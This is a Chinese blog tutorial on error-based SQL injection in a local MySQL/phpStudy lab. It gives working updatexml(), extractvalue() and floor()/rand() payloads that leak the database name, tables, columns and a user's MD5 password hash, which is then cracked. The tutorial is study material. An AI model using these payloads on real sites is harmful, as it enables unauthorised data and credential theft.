Fighting_hawk
Fighting_hawk

【SQL注入03】报错注入实例操作

1 报错注入概述

  1. 定义:与union联合查询注入类似,报错注入是利用网站的报错信息来带出我们想要的信息。
  2. 使用优先级:考虑到成功率和时间成本比union成本高,因此该方法在uninon无法实施时再做尝试。
    1. union联合查询注入实施的条件是网页能回显我们第二条select语句的内容;
    2. 报错注入实施的条件的网页能回显执行语句出错时的错误信息。

2 常用的报错注入命令

2.1 测试平台

  1. 虚拟机中打开phpstudy环境,真实机输入“虚拟机IP+/phpMyAdmin/”打开数据库管理界面,输入默认账号密码root进行登录。
  2. 顺便进入一个数据库,来到SQL语句界面,将下面两个√上,然后按下图顺序测试下面的命令。
    【SQL注入03】报错注入实例操作_第1张图片

2.2 floor()+rand()+group()函数

输入命令报错并带回版本信息select * from messages where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
【SQL注入03】报错注入实例操作_第2张图片

2.3 extractvalue()函数

输入命令报错并带回当前用户名。select * from messages where id=1 and (extractvalue(1, concat(0x5c, (select user()))))
【SQL注入03】报错注入实例操作_第3张图片

2.4 updatexml()函数☆☆推荐使用☆☆

输入命令报错并带回当前用户名。select * from messages where id = 1 AND (updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
【SQL注入03】报错注入实例操作_第4张图片

2.5 测试失败的命令

以下这些命令测试失败了,不知道后续能不能抢救以下,先记录下来。

select * from messages where id=1 and geometrycollection((select * from(select * from(select user())a)b));
select * from messages where id=1 and multipoint((select * from(select * from(select user())a)b));
select * from messages where id=1 and polygon((select * from(select * from(select user())a)b));
select * from messages where id=1 and multipolygon((select * from(select * from(select user())a)b));
select * from messages where id=1 and linestring((select * from(select * from(select user())a)b));
select * from messages where id=1 and multilinestring((select * from(select * from(select user())a)b));
select * from messages where id=1 and exp(~(select * from(select user())a));

3 获取敏感信息

3.1 获取数据库名

与上一节union查询类似,使用命令让报错信息显示出站点所在数据库名。select * from messages where id = 1 AND (updatexml(1,concat(0x7e,(select database()),0x7e),1))
【SQL注入03】报错注入实例操作_第5张图片

3.2 获取表名

与上一节union查询类似,使用命令让报错信息显示出站点所在数据库名下所有表名。select * from messages where id = 1 AND (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e),1))
【SQL注入03】报错注入实例操作_第6张图片

3.3 获取字段名

  1. 与上一节union查询类似,使用命令让报错信息显示出站点所在users表名下所有字段名。select * from messages where id = 1 AND (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'users'),0x7e),1))。出乎意料的是最后一个字段名少了几个字母,同时结尾也不是~。
    【SQL注入03】报错注入实例操作_第7张图片
  2. 我们将上述命令的标志符号更换为两个#,输出结果依旧在结尾是异常的,真正的字段名应该是signature,暂时未找到原因。select * from messages where id = 1 AND (updatexml(1,concat('##',(select group_concat(column_name) from information_schema.columns where table_name = 'users'),'##'),1))
    【SQL注入03】报错注入实例操作_第8张图片
    【SQL注入03】报错注入实例操作_第9张图片
  3. 当我们尝试让错误回显信息不带有起止标志符时,输入命令select * from messages where id = 1 AND (updatexml(1,(select group_concat(column_name) from information_schema.columns where table_name = 'users'),1))。回显结果少了一个字段名。与第2步对比可知完整的字段名内容。
    【SQL注入03】报错注入实例操作_第10张图片

3.4 获取字段内容

  1. 与上一节union查询类似,使用命令让报错信息显示users表上账号与密码的字段内容。select * from messages where id = 1 AND (updatexml(1,concat(0x7e,(select concat(name,':',password) from users limit 0,1),0x7e),1)),显示结果如下,可以看到与查询字段名相同,结尾少了结束符。
    【SQL注入03】报错注入实例操作_第11张图片
  2. 去掉结束符试试,再次输入命令select * from messages where id = 1 AND (updatexml(1,(select concat(name,':',password) from users limit 0,1),1))。与查询字段名相同,取消起止标识符后,回显信息少了开头部分的。
    【SQL注入03】报错注入实例操作_第12张图片
  3. 结合第1、2步,猜测账号为a,加密后的密码是0cc175b9c0f1b6a831c399e269772661,在md5网站查询后该密文对应的名为是a。
    【SQL注入03】报错注入实例操作_第13张图片

4 总结

  1. SQL注入优先级:union注入>报错注入>布尔盲注>延迟注入;
  2. 了解报错注入常用的几个命令;
  3. 掌握使用updataxml()函数进行报错注入;
  4. updataxml()对仅能获取返回32位字符,对于长字符串需要分批次获取。

你可能感兴趣的:(#,筑基07:WEB漏洞原理,sql,数据库,database)

  • SpringCloud负载均衡原理
    SpringCloud负载均衡原理org.springframework.cloud.loadbalancer.core.RoundRobinLoadBalancerprivateResponsegetInstanceResponse(Listinstances){if(instances.isEmpty()){if(log.isWarnEnabled()){log.warn("Noservers
  • 【MySQL高可用集群】MySQL的MGR搭建 架构师之路魂 数据库mysql数据库MGR高可用集群
    前情提要:MySQL官方在5.7.17版本正式推出组复制(MySQLGroupReplication,简称MGR),使用类似zookeeper的多于一半原则。在一个集群由2N+1个节点共同组成一个复制组,一个事务的提交,必须经过N+1(也就是集群节点数/2+1)个节点决议并通过后才可以提交。这是目前MySQL数据库高可用与高扩展的最优解决方案。MGR有以下几个限制条件:1、存储引擎必须为Innod
  • 为什么中药能治病?核心原理是什么? 4bf825984a00
    一、为什么中药能治病?中医用来治病的药物是中药,而中药大多取自于天然的植物、动物、矿物,其中尤以植物为多,所以在古代,中药也被称为“本草”。相传,中药的发现和运用,都来自起源于神农氏,自古民间有“神农尝百草”的传说。为什么草根树皮能够治疗人的疾病,中药能治病到底是什么原因呢?人得天地之全性,草木得天地之偏性。中医认为,人和万物都得天地一气而生,但人得天地之全性,草木得天地之偏性,人得病就是人体气机
  • 数据库第一次作业和第二次作业 zsk123456_ 数据库
    1.要求2.作业代码好的,这份“第一次作业”的核心内容是要求完成MySQL8.0数据库的安装(在Windows环境下),创建数据库mydb6_product,并在其中创建三张具有特定结构的表(employees,orders,invoices)。下面是完成此任务所需的正确步骤和SQL语句:核心任务分解与解决方案任务1:在Windows上安装MySQL8.0推荐方式(之一):使用官方MySQLIns
  • 数据仓库是什么,一文读懂数据仓库设计步骤 Leo.yuan 数据数据仓库大数据人工智能数据库信息可视化
    目录一、数据仓库:干啥用的?1.数据仓库是啥?2.数据仓库有啥大用?二、设计之前:准备啥?1.搞清楚业务要啥2.摸清数据家底3.划好仓库边界三、概念设计:搭框架1.定好主题域2.分清维度和事实3.画出概念模型四、逻辑设计:定细节1.设计维度表和事实表2.想好怎么存数据3.定好安全规矩五、物理设计:落地实施1.选好数据库软件2.优化数据库性能3.部署上线六、实施与测试:跑起来1.ETL:灌数据2.全
  • https交互原理 黑塞123 Modernc++https网络协议
    Https交互时序图:HTTPS通信中结合RSA和AES加密的流程,本质是利用RSA的安全特性交换AES密钥,再用高效的AES加密实际数据传输。HTTPS交互核心流程(TLS/SSL握手)1.建立TCP连接客户端通过TCP三次握手连接服务器的443端口。2.TLS/SSL握手(密钥协商阶段)ClientHello客户端发送支持的功能列表:TLS版本、支持的加密套件(如TLS_RSA_WITH_AE
  • Spring, Spring Boot 和Spring MVC的关系以及区别 棕豆兔& 面试总结springspringbootmvc
    一、Spring简单来说,Spring是一个开发应用框架,主打轻量级、一站式、模块化,其目的是用于简化企业级应用程序开发。Spring的主要功能:管理对象,以及对象之间的依赖关系,面向切面编程,数据库事务管理,数据访问,web框架支持等。但是Spring具备高度可开放性,并不强制依赖Spring,开发者可以自由选择Spring的部分或者全部,Spring可以无缝继承第三方框架,比如数据访问框架(H
  • Oracle数据库性能调优完整指南.zip 高杉峻
    本文还有配套的精品资源,点击获取简介:Oracle数据库性能优化是企业和数据库专业人员必须掌握的关键技能。Oracle作为广泛使用的数据库管理系统,其性能直接影响业务效率。本文档深入探讨了性能优化的各个方面,包括SQL优化、索引管理、表和分区设计、内存调优、系统资源管理、并发控制、日志和归档策略、性能监控和诊断,以及数据库架构优化和版本升级。通过综合考虑业务场景和硬件环境,结合Oracle提供的工
  • 34、Oracle数据库调优全攻略 tequila 精通OracleOracle数据库调优STATSPACK
    Oracle数据库调优全攻略1.调优目标与策略调优的目标是让数据库满足业务需求,即解决依赖系统的用户所发现的问题。管理者和终端用户更关心报表能否按时生成以及数据能否快速返回屏幕,而非数据库内部的精妙程度。因此,需要明确他们认为重要的方面,然后进行调优以实现目标。例如,对于OLTP系统性能不佳的情况,应专注于让数据快速返回屏幕,而非修复偶尔出现的批处理作业。调优时要关注能带来最大收益的领域,并知道何
  • postgresql之语法解析 浅析 happytree001 pgpostgresql
    一、pg语法简介1.1语法文件结构语法.y文件和词法.l文件结构差不多,也是通过%%分成了三个部分:声明部分、语法规则部分、C代码部分。src/backend/parser/gram.y####声明部分%{C代码头文件,变量声明等(此范围内的内容原样输出到文件中)#include"postgres.h"...%}#变量声明%union{core_YYSTYPEcore_yystype;/*thes
  • 39、Oracle 数据库内存管理:SGA 与 PGA 配置指南 apple5 解读OracleOracle数据库SGA配置PGA配置
    Oracle数据库内存管理:SGA与PGA配置指南1.手动配置SGA参数如果你想对系统全局区(SGA)的内存分配进行更多控制,可以从完全自动内存管理(AMM)切换到自动共享内存管理(ASMM)。启用ASMM很简单,只需将SGA_TARGET设置为所需的值。即使启用了ASMM,你仍然可以控制由SGA_TARGET控制的SGA组件的最小大小。此外,你还需要手动调整一些初始化参数。1.1理解自动共享内存
  • sqlplus连接Oracle 11g 数据库 zone-- sqlplusoracle
    sqlplus连接Oracle11g数据库安装如下Oracle11g安装教程//Anhighlightedblocksqlplus有几种登陆方式比如:sqlplus"/assysdba"--以操作系统权限认证的oraclesys管理员登陆sqlplus/nolog--不在cmd或者terminal当中暴露密码的登陆方式conn/assysdbaconnsys/passwordassysdbasql
  • Oracle 19C 后台主要进程的功能解析 zone-- 数据库oracledba
    在Oracle数据库的运行机制中,后台进程是支撑数据库各项功能的“隐形引擎”。这些进程在实例启动时自动创建,负责完成数据读写、故障恢复、资源管理等核心任务。本文基于Oracle19c官方文档,对数据库常见后台进程进行系统梳理,帮助数据库管理员理解进程工作原理,为性能调优和故障诊断提供基础。后台进程的基础特性Oracle后台进程是指在V$PROCESS视图中存在且PNAME列非空的进程,它们独立于用
  • Oracle 数据泵导出表部分列的实现方案:从 12c 新特性到低版本兼容 zone-- oracle数据库
    在Oracle数据库日常运维中,经常会遇到“只导出表中部分列”的需求——例如某张表包含数十个字段,但业务仅需迁移其中3-5个核心字段的数据。传统的导出工具(如exp或expdp)虽能通过QUERY参数过滤行记录,却无法实现列的筛选。本文基于实践经验,详解不同Oracle版本下导出表部分列的解决方案,包括12c及以上版本的便捷方法和11g及以下版本的兼容方案。12c及以上版本:利用VIEWS_AS_
  • PostgreSQL 语法详解 沐知全栈开发 开发语言
    PostgreSQL语法详解引言PostgreSQL是一款功能强大的开源对象关系型数据库管理系统(ORDBMS),广泛应用于各种规模的组织中。其丰富的功能和灵活性使得它成为了众多数据库开发者和运维人员的首选。本文将详细介绍PostgreSQL的语法,帮助读者快速掌握其基本操作。1.数据库连接在操作PostgreSQL之前,首先需要连接到数据库。以下是一个使用PostgreSQL客户端连接到本地数据
  • RxJava 全解析:从原理到 Android 实战 Monkey-旭 javarxjava响应式编程android
    在Android开发中,异步任务处理是绕不开的核心场景——网络请求、数据库操作、文件读写等都需要在后台执行,而结果需回调到主线程更新UI。传统的“Handler+Thread”或AsyncTask不仅代码冗余,还容易陷入“回调地狱”(嵌套回调导致代码可读性差)。RxJava作为一款基于响应式编程思想的异步框架,通过“链式调用”和“操作符”完美解决了这些问题,成为Android开发者的必备工具。本文
  • JAVA 使用Apache POI合并Word文档并保留批注的实现
    一、需求背景在实际工作中,我们经常需要将多个Word文档合并成一个文件。但当文档中包含批注(Comments)时,传统的复制粘贴会导致批注丢失或引用错乱。本文将介绍如何通过Java和ApachePOI库实现保留批注及引用关系的文档合并功能。二、技术选型核心依赖:org.apache.poipoi-ooxml5.3.0org.apache.poipoi-ooxml-full5.3.0三、实现原理详解
  • jxORM--编程指南 jxandrew jxWebUI数据库pythonjxWebUIjxORMORM
    jxORM是jxWebUI配套的数据库操作库,可以简化python程序员操作数据库。声明数据类定义数据类之前,先导入ORM修饰符:fromjxORMimportORM,DBDataType,ColType然后就可以用ORM修饰符来修饰一个类,从而定义一个数据类:@ORMclassUser:ID:DBDataType.Long=ColType.PrimaryKeyCreateTime:DBDataT
  • Oracle 数据库共享池与大池调优指南 zone-- 数据库oracle
    在Oracle数据库的内存管理中,共享池(SharedPool)和大池(LargePool)是SGA(系统全局区)中负责缓存与资源分配的核心组件。合理配置和调优这两个池,能显著提升数据库性能——尤其是在减少解析开销、降低锁竞争、优化内存利用率等方面。本文基于Oracle19c官方文档,系统梳理共享池与大池的调优思路、关键配置及实践方法。共享池:核心缓存与解析优化的关键共享池是SGA中用于缓存SQL
  • MySQL分布式架构深度实践:从分库分表到云原生集成 软考和人工智能学堂 PHP和MySQLMySQL经验与技巧wpf
    1.分布式MySQL架构全景graphTDA[分布式MySQL体系]-->B[数据分片策略]A-->C[分布式事务处理]A-->D[读写分离扩展]A-->E[高可用架构]A-->F[云原生集成]B-->B1(水平分库分表)B-->B2(垂直分库分表)B-->B3(分片路由策略)B-->B4(全局ID方案)C-->C1(XA协议)C-->C2(TCC模式)C-->C3(SAGA模式)C-->C4(本
  • 空间曲线正交投影及其距离计算的理论与实践 老歌老听老掉牙 python正交投影
    引言:正交投影的几何本质在三维空间中,正交投影是一种基础而重要的几何变换,它将空间中的点沿特定方向映射到一个平面上。当我们考虑将空间曲线投影到由给定法向量n\mathbf{n}n定义的平面时,这一问题在计算机图形学、CAD/CAM系统和科学计算中具有广泛应用。本文将从数学原理、Python实现到距离计算的等价性问题,全面探讨这一几何操作的深层内涵。设空间曲线由参数方程r(t)=(x(t),y(t)
  • ForkJoinPool用法及原理
    1.什么是ForkJoinPoolForkJoinPool可以理解为能够将提交的任务进行拆分的线程池,简单来说如果我们提交一个从1累加到10亿的值,如果这个任务提交给线程池,线程池中不论有多少个线程都只会拿出其中一条线程执行这个任务,但是如果这个任务提交给ForkJoinPool他能够将这个大任务进行拆分执行,能够利用上我们我们定义ForkJoinPool中的所有线程2.ForkJoinPool和
  • 云原生技术与应用-Kubernetes服务发布基础 慕桉 ~ 云原生kubernetes容器
    目录一.service定义二.K8s服务发布的核心组件1.Pod:服务的基本运行单元2.Service:稳定访问Pod的抽象层3.Deployment:管理Pod的部署与更新三.service的工作原理四.service的负载均衡机制1.userspace模式2.iptables模式3.ipvs模式service的四种类型五.测试service的四种类型1.ClusterIP2.NodePort3
  • Redis入门教程(一):基本数据类型
    一、Redis是什么?为什么你需要它?Redis(RemoteDictionaryServer)是一个开源的内存数据结构存储系统,它可以用作数据库、缓存和消息中间件。与传统的关系型数据库不同,Redis将数据存储在内存中,使其读写速度达到惊人的11万次读/秒和8.1万次写/秒。同时支持数据持久化,重启后数据不丢失,完美平衡了速度与可靠性。Redis的五大核心优势:丰富的数据结构:支持字符串(Str
  • Milvus向量数据库集合操作初尝试 麦克阿建 milvus
    目录1.集合(Collection)2.字段(Field)3.索引(Index)4.分区(Partition)5.实体(Entity)6.代码示例6.1集合创建6.2向量插入6.3向量查询6.4向量删除1.集合(Collection)集合是Milvus中存储数据的最基本单元。它类似于数据库中的一个表(table)。集合定义了数据的整体结构,包括数据类型、字段、索引等。作用:集合是你数据的容器,用来
  • 高阶知识库搭建实战五、(向量数据库Milvus安装) 伯牙碎琴 大模型数据库milvus大模型AI
    以下是关于在Windows环境下直接搭建Milvus向量数据库的教程:本教程分两部分,第一部分是基于docker安装,在Windows环境下直接安装Milvus向量数据库,目前官方推荐的方式是通过Docker进行部署,因为Milvus的运行环境依赖于Linux系统。如果你希望在Windows上直接运行Milvus,可以考虑使用MilvusLite版本,这是一个轻量级的Python库,适用于快速原型
  • Embedding与向量数据库 玖月初玖 大模型应用开发基础人工智能embedding数据库
    1.Embedding是什么EmbeddingModel是一种机器学习模型,它的核心任务是将离散的、高维的符号(如单词、句子、图片、用户、商品等)转换成连续的、低维的向量(称为“嵌入”或“向量表示”),并且这个向量能有效地捕捉原始符号的语义、关系或特征。1.1通俗理解EmbeddingModel是让计算机“理解”世界的核心工具,把“文字、图片、音频”等信息变成一串有意义的数字我们称之为“向量”。类
  • 社交应用全栈开发实战:前后端与数据库整合
    本文还有配套的精品资源,点击获取简介:本资源包详细介绍了构建一个社交应用程序的全过程,包括前端、后端以及数据库管理的核心组件和关键功能。Uniapp框架用于开发跨平台的移动端用户界面,Java后端负责处理业务逻辑和数据交互,MySQL数据库用于管理用户信息和动态数据。项目还包括前后端通信、身份验证、性能优化和推送通知服务的实现。学习这些代码可以提升开发者的技能,帮助快速构建社交应用。1.社交APP
  • 声控灯设计与Protus仿真 语嫣凝冰
    本文还有配套的精品资源,点击获取简介:声控灯是智能家居系统中关键的智能设备,通过声音信号控制灯光的开关。本文深入分析了声控灯的设计原理、工作流程,并探讨了如何利用Protus软件进行声控灯的仿真,以及电位器在灵敏度调节中的应用。学生将学习声控模块的组成和阈值设定,以及如何使用Protus软件来模拟声控灯的实际运作,优化其性能。1.声控灯设计原理声控灯技术是一种利用声音信号来控制灯具开关的现代照明技
  • 新版进销存管理系统完整教程:PB9.0与SQL Server 2000的实战应用 语嫣凝冰
    本文还有配套的精品资源,点击获取简介:本文档提供了一个基于PowerBuilder9.0和SQLServer2000开发的进销存管理系统的全面教程。系统涵盖了企业管理中的采购、销售和库存管理环节,通过强大的数据窗口组件和三层架构设计,实现了业务逻辑和数据库的有效交互。文章详细解释了系统的技术栈、核心功能、系统架构、数据窗口组件、数据库设计、报表分析及权限安全管理等关键点,旨在帮助用户深入理解进销存
  • SQL的各种连接查询 xieke90 UNION ALLUNION外连接内连接JOIN
    一、内连接   概念:内连接就是使用比较运算符根据每个表共有的列的值匹配两个表中的行。                 内连接(join 或者inner join )       SQL语法:       select * fron
  • java编程思想--复用类 百合不是茶 java继承代理组合final类
          复用类看着标题都不知道是什么,再加上java编程思想翻译的比价难懂,所以知道现在才看这本软件界的奇书   一:组合语法:就是将对象的引用放到新类中即可     代码:     package com.wj.reuse; /** * * @author Administrator 组
  • [开源与生态系统]国产CPU的生态系统 comsci cpu
          计算机要从娃娃抓起...而孩子最喜欢玩游戏....       要让国产CPU在国内市场形成自己的生态系统和产业链,国家和企业就不能够忘记游戏这个非常关键的环节....       投入一些资金和资源,人力和政策,让游
  • JVM内存区域划分Eden Space、Survivor Space、Tenured Gen,Perm Gen解释 商人shang jvm内存
    jvm区域总体分两类,heap区和非heap区。heap区又分:Eden Space(伊甸园)、Survivor Space(幸存者区)、Tenured Gen(老年代-养老区)。 非heap区又分:Code Cache(代码缓存区)、Perm Gen(永久代)、Jvm Stack(java虚拟机栈)、Local Method Statck(本地方法栈)。 HotSpot虚拟机GC算法采用分代收
  • 页面上调用 QQ oloz qq
    <A href="tencent://message/?uin=707321921&amp;Site=有事Q我&amp;Menu=yes">   <img style="border:0px;" src=http://wpa.qq.com/pa?p=1:707321921:1></a>
  • 一些问题 文强chu 问题
    1.eclipse 导出 doc  出现“The Javadoc command does not exist.” javadoc command 选择 jdk/bin/javadoc.exe 2.tomcate 配置 web 项目 ..... SQL:3.mysql  * 必须得放前面 否则  select&nbs
  • 生活没有安全感 小桔子 生活孤独安全感
           圈子好小,身边朋友没几个,交心的更是少之又少。在深圳,除了男朋友,没几个亲密的人。不知不觉男朋友成了唯一的依靠,毫不夸张的说,业余生活的全部。现在感情好,也很幸福的。但是说不准难免人心会变嘛,不发生什么大家都乐融融,发生什么很难处理。我想说如果不幸被分手(无论原因如何),生活难免变化很大,在深圳,我没交心的朋友。明
  • php 基础语法 aichenglong php 基本语法
    1 .1 php变量必须以$开头 <?php $a=” b”; echo ?> 1 .2 php基本数据库类型 Integer  float/double Boolean string 1 .3 复合数据类型 数组array和对象 object 1 .4 特殊数据类型  null 资源类型(resource)    $co
  • mybatis tools 配置详解 AILIKES mybatis
    MyBatis Generator中文文档 MyBatis Generator中文文档地址: http://generator.sturgeon.mopaas.com/ 该中文文档由于尽可能和原文内容一致,所以有些地方如果不熟悉,看中文版的文档的也会有一定的障碍,所以本章根据该中文文档以及实际应用,使用通俗的语言来讲解详细的配置。 本文使用Markdown进行编辑,但是博客显示效
  • 继承与多态的探讨 百合不是茶 JAVA面向对象 继承 对象
    继承 extends   多态 继承是面向对象最经常使用的特征之一:继承语法是通过继承发、基类的域和方法 //继承就是从现有的类中生成一个新的类,这个新类拥有现有类的所有extends是使用继承的关键字:     在A类中定义属性和方法; class A{ //定义属性 int age; //定义方法 public void go
  • JS的undefined与null的实例 bijian1013 JavaScriptJavaScript
    <form name="theform" id="theform"> </form> <script language="javascript"> var a alert(typeof(b)); //这里提示undefined if(theform.datas
  • TDD实践(一) bijian1013 java敏捷TDD
    一.TDD概述         TDD:测试驱动开发,它的基本思想就是在开发功能代码之前,先编写测试代码。也就是说在明确要开发某个功能后,首先思考如何对这个功能进行测试,并完成测试代码的编写,然后编写相关的代码满足这些测试用例。然后循环进行添加其他功能,直到完全部功能的开发。     
  • [Maven学习笔记十]Maven Profile与资源文件过滤器 bit1129 maven
    什么是Maven Profile Maven Profile的含义是针对编译打包环境和编译打包目的配置定制,可以在不同的环境上选择相应的配置,例如DB信息,可以根据是为开发环境编译打包,还是为生产环境编译打包,动态的选择正确的DB配置信息   Profile的激活机制 1.Profile可以手工激活,比如在Intellij Idea的Maven Project视图中可以选择一个P
  • 【Hive八】Hive用户自定义生成表函数(UDTF) bit1129 hive
    1. 什么是UDTF   UDTF,是User Defined Table-Generating Functions,一眼看上去,貌似是用户自定义生成表函数,这个生成表不应该理解为生成了一个HQL Table, 貌似更应该理解为生成了类似关系表的二维行数据集   2. 如何实现UDTF 继承org.apache.hadoop.hive.ql.udf.generic
  • tfs restful api 加auth 2.0认计 ronin47
      目前思考如何给tfs的ngx-tfs api增加安全性。有如下两点:   一是基于客户端的ip设置。这个比较容易实现。   二是基于OAuth2.0认证,这个需要lua,实现起来相对于一来说,有些难度。   现在重点介绍第二种方法实现思路。    前言:我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算,阅读下面的文档,实现自动化并获得收益。SeatGe
  • jdk环境变量配置 byalias javajdk
    进行java开发,首先要安装jdk,安装了jdk后还要进行环境变量配置: 1、下载jdk(http://java.sun.com/javase/downloads/index.jsp),我下载的版本是:jdk-7u79-windows-x64.exe 2、安装jdk-7u79-windows-x64.exe 3、配置环境变量:右击"计算机"-->&quo
  • 《代码大全》表驱动法-Table Driven Approach-2 bylijinnan java
    package com.ljn.base; import java.io.BufferedReader; import java.io.FileInputStream; import java.io.InputStreamReader; import java.util.ArrayList; import java.util.Collections; import java.uti
  • SQL 数值四舍五入 小数点后保留2位 chicony 四舍五入
    1.round() 函数是四舍五入用,第一个参数是我们要被操作的数据,第二个参数是设置我们四舍五入之后小数点后显示几位。 2.numeric 函数的2个参数,第一个表示数据长度,第二个参数表示小数点后位数。 例如:   select   cast(round(12.5,2)   as   numeric(5,2))  
  • c++运算符重载 CrazyMizzz C++
    一、加+,减-,乘*,除/ 的运算符重载 Rational operator*(const Rational &x) const{ return Rational(x.a * this->a); } 在这里只写乘法的,加减除的写法类似 二、<<输出,>>输入的运算符重载      &nb
  • hive DDL语法汇总 daizj hive修改列DDL修改表
    hive DDL语法汇总 1、对表重命名 hive> ALTER TABLE table_name RENAME TO new_table_name;   2、修改表备注 hive> ALTER TABLE table_name SET TBLPROPERTIES ('comment' = new_comm
  • jbox使用说明 dcj3sjt126com Web
    参考网址:http://www.kudystudio.com/jbox/jbox-demo.html jBox v2.3 beta [ 点击下载]  技术交流QQGroup:172543951 100521167 [2011-11-11] jBox v2.3 正式版 - [调整&修复] IE6下有iframe或页面有active、applet控件
  • UISegmentedControl 开发笔记 dcj3sjt126com
      //    typedef NS_ENUM(NSInteger, UISegmentedControlStyle) {     //        UISegmentedControlStylePlain,     // large plain   &
  • Slick生成表映射文件 ekian scala
    Scala添加SLICK进行数据库操作,需在sbt文件上添加slick-codegen包 "com.typesafe.slick" %% "slick-codegen" % slickVersion 因为我是连接SQL Server数据库,还需添加slick-extensions,jtds包 "com.typesa
  • ES-TEST gengzg test
    package com.MarkNum; import java.io.IOException; import java.util.Date; import java.util.HashMap; import java.util.Map; import javax.servlet.ServletException; import javax.servlet.annotation
  • 为何外键不再推荐使用 hugh.wang mysqlDB
    表的关联,是一种逻辑关系,并不需要进行物理上的“硬关联”,而且你所期望的关联,其实只是其数据上存在一定的联系而已,而这种联系实际上是在设计之初就定义好的固有逻辑。 在业务代码中实现的时候,只要按照设计之初的这种固有关联逻辑来处理数据即可,并不需要在数据库层面进行“硬关联”,因为在数据库层面通过使用外键的方式进行“硬关联”,会带来很多额外的资源消耗来进行一致性和完整性校验,即使很多时候我们并不
  • 领域驱动设计 julyflame VODAO设计模式DTOpo
    概念: VO(View Object):视图对象,用于展示层,它的作用是把某个指定页面(或组件)的所有数据封装起来。 DTO(Data Transfer Object):数据传输对象,这个概念来源于J2EE的设计模式,原来的目的是为了EJB的分布式应用提供粗粒度的数据实体,以减少分布式调用的次数,从而提高分布式调用的性能和降低网络负载,但在这里,我泛指用于展示层与服务层之间的数据传输对
  • 单例设计模式 hm4123660 javaSingleton单例设计模式懒汉式饿汉式
           单例模式是一种常用的软件设计模式。在它的核心结构中只包含一个被称为单例类的特殊类。通过单例模式可以保证系统中一个类只有一个实例而且该实例易于外界访问,从而方便对实例个数的控制并节约系统源。如果希望在系统中某个类的对象只能存在一个,单例模式是最好的解决方案。      &nb
  • logback zhb8015 loglogback
    一、logback的介绍      Logback是由log4j创始人设计的又一个开源日志组件。logback当前分成三个模块:logback-core,logback- classic和logback-access。logback-core是其它两个模块的基础模块。logback-classic是log4j的一个 改良版本。此外logback-class
  • 整合Kafka到Spark Streaming——代码示例和挑战 Stark_Summer sparkstormzookeeperPARALLELISMprocessing
    作者Michael G. Noll是瑞士的一位工程师和研究员,效力于Verisign,是Verisign实验室的大规模数据分析基础设施(基础Hadoop)的技术主管。本文,Michael详细的演示了如何将Kafka整合到Spark Streaming中。 期间, Michael还提到了将Kafka整合到 Spark Streaming中的一些现状,非常值得阅读,虽然有一些信息在Spark 1.2版
  • spring-master-slave-commondao 王新春 DAOspringdataSourceslavemaster
    互联网的web项目,都有个特点:请求的并发量高,其中请求最耗时的db操作,又是系统优化的重中之重。 为此,往往搭建 db的 一主多从库的 数据库架构。作为web的DAO层,要保证针对主库进行写操作,对多个从库进行读操作。当然在一些请求中,为了避免主从复制的延迟导致的数据不一致性,部分的读操作也要到主库上。(这种需求一般通过业务垂直分开,比如下单业务的代码所部署的机器,读去应该也要从主库读取数
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他